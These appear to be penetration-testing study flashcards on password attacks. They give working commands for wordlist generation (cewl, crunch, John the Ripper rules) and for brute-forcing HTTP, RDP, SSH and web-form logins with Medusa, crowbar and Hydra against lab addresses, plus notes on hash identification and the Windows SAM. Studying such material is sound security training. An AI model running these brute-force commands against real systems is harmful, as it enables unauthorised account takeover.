Password Attacks Flashcards
What is the name of the tool that creates a custom word list based on the website?
Give an example using it with the URL www.megacorpone.com
– cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt
What is the name of the tool that is a fast password cracker with the ability to generate custom wordlists?
Where is the configuration file to alter password rules?
- John The Ripper
- /etc/john/john.conf
How would you add a rule to JTR that adds a 2 digit number to the end of each password?
- sudo vim /etc/john/john.conf
- $[0-9]$[0-9]
What is a wordlist generator provided with Kali that can create word lists based on specific password policies?
Crunch
What are the character placeholder translations for ‘crunch’?
- @ = lower case alpha characters
- , = upper case alpha characters
- % = numeric characters
- ^ = special characters including spaces
Use ‘crunch to create a word list that is 8 characters in length, and follows the password structure of [capital letter][2 x lower case letters][2 x special characters][3 x numeric characters]
– crunch 8 8 -t ,@@^^%%%
What are some risks with network service password attacks?
- noisy
- generate logs
- may lock accounts out
What command prepares the ‘rockyou’ word list for use?
– sudo gunzip /usr/share/wordlists/rockyou.txt.gz
What tool is best used for an HTTP htaccess password attack?
- Medusa
- THC-Hydra
How would you use Medusa to attack the ‘admin’ account on an HTTP server at 10.11.0.22 on the ‘/admin’ page, with the ‘rockyou’ word list?
medusa -h 10.11.0.22 -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin
What tool is recommended to for an RDP password attack?
- crowbar
How do you install ‘crowbar’?
- sudo apt install crowbar
What command would attempt an RDP password attack against 10.11.0.22/32 with the user ‘admin’ and password file ‘password-file.txt’?
crowbar -b rdp -s 10.11.0.22/32 -u admin -C ~/password-file.txt -n 1
What tool is recommended for SSH password attacks?
THC-Hydra
How would you use THC-Hydra for an SSH password attack against 10.11.0.22 with the ‘rockyou’ wordlist against the ‘admin’ user?
– hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.11.0.22
What tool is recommended or an HTTP Post password attack?
- THC-Hydra
What needs to be known for an HTTP Post password attack with Hydra?
- IP address
- URL of webpage containing the web form
- ‘condition string’ that indicates an unsuccessful login attempt (ex. INVALID LOGIN)
What is the best way to get the information required for Hydra for an HTTP Post password attack?
- view the page source on the login page
- this should show what page handles the POST request (ex. /form/frontpage.php)
What command should be used for an HTTP POST password attack with Hydra, given the following information:
- IP = 10.11.0.22
- POST URL = /form/frontpage.php
- user = admin
- condition string = ‘INVALID LOGIN’
- wordlist = rockyou
hydra 10.11.0.22 http-form-post “/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN” -l admin -P /usr/share/wordlists/rockyou.txt -vV -f
What tool is recommended for identifying the type of hash?
hashid
Given a hash ‘$6$l5bL6XIASslBwwUD$bCxeTlbhTH76wE. bI66aMYSeDXKQ8s7JNFwa1s1KkTand
6ZsqQKAF3G0tHD9bd59e5NAz/s7DQcAojRTWNpZX0’ how would you check for possible hashing algorithms used to created this hash?
kali@kali:~$ hashid ‘$6$l5bL6XIASslBwwUD$bCxeTlbhTH76wE. bI66aMYSeDXKQ8s7JNFwa1s1KkTand
6ZsqQKAF3G0tHD9bd59e5NAz/s7DQcAojRTWNpZX0’
Analyzing ‘$6$l5bL6XIASslBwwUD$bCxeTlbhTH76wE. bI66aMYSeDXKQ8s7JNFwa1s1KkTand6ZsqQKAF3G
0tHD9bd59e5NAz/s7DQcAojRTWNpZX0’
[+] SHA-512 Crypt
What is a recommended website for looking up hashes?
HashKiller
On Windows, where are hashed user passwords stored?
- SAM
- Security Accounts Manager
What protective mechanism was implemented to protect against offline SAM database password attacks?
- SYSKEY
- Partially encrypts the SAM file
